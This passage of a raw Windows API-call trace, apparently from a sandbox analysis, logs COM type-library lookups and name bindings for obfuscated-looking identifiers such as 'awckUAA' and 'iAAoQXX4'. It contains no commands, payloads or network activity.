ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.797] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RACC1_") returned 0x106c04 [0068.797] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="RACC1_" | out: _Dst="RACC1_") returned 0x0 [0068.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="RACC1_") returned 7 [0068.797] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.797] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="RACC1_", lHashVal=0x106c04, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.797] IUnknown:Release (This=0x665ba50) returned 0xd [0068.797] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.797] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="RACC1_", lHashVal=0x106c04, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.797] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.797] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.797] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="RACC1_", lHashVal=0x106c04, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.797] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.797] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.797] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="RACC1_", lHashVal=0x106c04, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.797] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60d1a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="RACC1_") returned 7 [0068.797] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="RACC1_", lHashVal=0x106c04, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.797] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.797] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60d1a | out: _Dst=0x67c2d40) returned 0x0 [0068.797] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_RACC1_") returned 0x10e6ad [0068.797] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_RACC1_" | out: _Dst="_B_var_RACC1_") returned 0x0 [0068.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_RACC1_") returned 14 [0068.797] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.797] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_RACC1_", lHashVal=0x10e6ad, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.797] IUnknown:Release (This=0x665ba50) returned 0xd [0068.797] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.797] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_RACC1_", lHashVal=0x10e6ad, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.798] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.798] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.798] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_RACC1_", lHashVal=0x10e6ad, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.798] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.798] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.798] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_RACC1_", lHashVal=0x10e6ad, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.798] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.798] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.798] IUnknown:Release (This=0x665ba50) returned 0xd [0068.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc262a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_RACC1_") returned 14 [0068.798] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_RACC1_", lHashVal=0x10e6ad, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x31004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x52005f00720061, ppTypeComp=0x31004300000000, pDummy=0x0) returned 0x0 [0068.798] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60d1a | out: _Dst=0x144ec0) returned 0x0 [0068.798] ITypeComp:RemoteBind (in: This=0x665ba60, szName="awckUAA", lHashVal=0x10a7ba, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60d42, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="awckUAA") returned 8 [0068.798] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="awckUAA", lHashVal=0x10a7ba, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60d42, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="awckUAA") returned 8 [0068.798] ITypeComp:RemoteBind (in: This=0x665bd30, szName="awckUAA", lHashVal=0x10a7ba, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.798] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="awckUAA") returned 0x10a7ba [0068.798] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="awckUAA" | out: _Dst="awckUAA") returned 0x0 [0068.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="awckUAA") returned 8 [0068.798] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.798] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="awckUAA", lHashVal=0x10a7ba, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.798] IUnknown:Release (This=0x665ba50) returned 0xd [0068.798] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.798] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="awckUAA", lHashVal=0x10a7ba, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.798] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.798] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.799] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="awckUAA", lHashVal=0x10a7ba, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.799] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.799] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.799] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="awckUAA", lHashVal=0x10a7ba, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.799] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60d42, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="awckUAA") returned 8 [0068.799] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="awckUAA", lHashVal=0x10a7ba, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.799] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.799] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a60d42 | out: _Dst=0x67c2d40) returned 0x0 [0068.799] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_awckUAA") returned 0x10ab3e [0068.799] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_awckUAA" | out: _Dst="_B_var_awckUAA") returned 0x0 [0068.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_awckUAA") returned 15 [0068.799] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.799] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_awckUAA", lHashVal=0x10ab3e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.799] IUnknown:Release (This=0x665ba50) returned 0xd [0068.799] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.799] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_awckUAA", lHashVal=0x10ab3e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.799] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.799] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.799] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_awckUAA", lHashVal=0x10ab3e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.799] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.799] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.799] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_awckUAA", lHashVal=0x10ab3e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.799] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.799] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.799] IUnknown:Release (This=0x665ba50) returned 0xd [0068.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc265a, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_awckUAA") returned 15 [0068.799] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_awckUAA", lHashVal=0x10ab3e, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x55006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x55006b00000000, pDummy=0x0) returned 0x0 [0068.799] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a60d42 | out: _Dst=0x144ec0) returned 0x0 [0068.799] ITypeComp:RemoteBind (in: This=0x665ba60, szName="iAAoQXX4", lHashVal=0x104e30, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60d6a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="iAAoQXX4") returned 9 [0068.800] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="iAAoQXX4", lHashVal=0x104e30, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60d6a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="iAAoQXX4") returned 9 [0068.800] ITypeComp:RemoteBind (in: This=0x665bd30, szName="iAAoQXX4", lHashVal=0x104e30, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.800] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAAoQXX4") returned 0x104e30 [0068.800] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="iAAoQXX4" | out: _Dst="iAAoQXX4") returned 0x0 [0068.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="iAAoQXX4") returned 9 [0068.800] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.800] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="iAAoQXX4", lHashVal=0x104e30, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.800] IUnknown:Release (This=0x665ba50) returned 0xd [0068.800] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.800] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="iAAoQXX4", lHashVal=0x104e30, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.800] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.800] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.800] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="iAAoQXX4", lHashVal=0x104e30, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.800] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.800] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.800] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="iAAoQXX4", lHashVal=0x104e30, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.800] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60d6a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="iAAoQXX4") returned 9 [0068.800] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="iAAoQXX4", lHashVal=0x104e30, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.800] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.800] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a60d6a | out: _Dst=0x67c2d40) returned 0x0 [0068.800] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_iAAoQXX4") returned 0x1025b9 [0068.800] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_iAAoQXX4" | out: _Dst="_B_var_iAAoQXX4") returned 0x0 [0068.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_iAAoQXX4") returned 16 [0068.800] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.800] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_iAAoQXX4", lHashVal=0x1025b9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.800] IUnknown:Release (This=0x665ba50) returned 0xd [0068.800] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.800] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_iAAoQXX4", lHashVal=0x1025b9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.801] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.801] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.801] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_iAAoQXX4", lHashVal=0x1025b9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.801] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.801] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.801] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_iAAoQXX4", lHashVal=0x1025b9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.801] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.801] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.801] IUnknown:Release (This=0x665ba50) returned 0xd [0068.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc268a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_iAAoQXX4") returned 16 [0068.801] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_iAAoQXX4", lHashVal=0x1025b9, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x51006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x51006f00000000, pDummy=0x0) returned 0x0 [0068.801] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf1b5b0, cb=0x8000) returned 0xaf1b5b0 [0068.801] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a60d6a | out: _Dst=0x144ec0) returned 0x0 [0068.801] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jDcAAAUA", lHashVal=0x1062fa, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60d96, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jDcAAAUA") returned 9 [0068.801] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jDcAAAUA", lHashVal=0x1062fa, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60d96, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jDcAAAUA") returned 9 [0068.801] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jDcAAAUA", lHashVal=0x1062fa, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jDcAAAUA") returned 0x1062fa [0068.801] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="jDcAAAUA" | out: _Dst="jDcAAAUA") returned 0x0 [0068.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="jDcAAAUA") returned 9 [0068.801] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.801] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jDcAAAUA", lHashVal=0x1062fa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.801] IUnknown:Release (This=0x665ba50) returned 0xd [0068.801] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.801] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jDcAAAUA", lHashVal=0x1062fa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.802] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.802] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.802] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jDcAAAUA", lHashVal=0x1062fa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.802] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.802] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.802] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jDcAAAUA", lHashVal=0x1062fa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.802] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60d96, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jDcAAAUA") returned 9 [0068.802] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jDcAAAUA", lHashVal=0x1062fa, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.802] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.802] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a60d96 | out: _Dst=0x67c2d40) returned 0x0 [0068.802] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jDcAAAUA") returned 0x103a83 [0068.802] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_jDcAAAUA" | out: _Dst="_B_var_jDcAAAUA") returned 0x0 [0068.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_jDcAAAUA") returned 16 [0068.802] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.802] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jDcAAAUA", lHashVal=0x103a83, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.802] IUnknown:Release (This=0x665ba50) returned 0xd [0068.802] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.802] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jDcAAAUA", lHashVal=0x103a83, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.802] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.802] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.802] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jDcAAAUA", lHashVal=0x103a83, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.802] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.802] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.802] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jDcAAAUA", lHashVal=0x103a83, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.802] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.802] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.802] IUnknown:Release (This=0x665ba50) returned 0xd [0068.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc26ba, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_jDcAAAUA") returned 16 [0068.802] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jDcAAAUA", lHashVal=0x103a83, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, 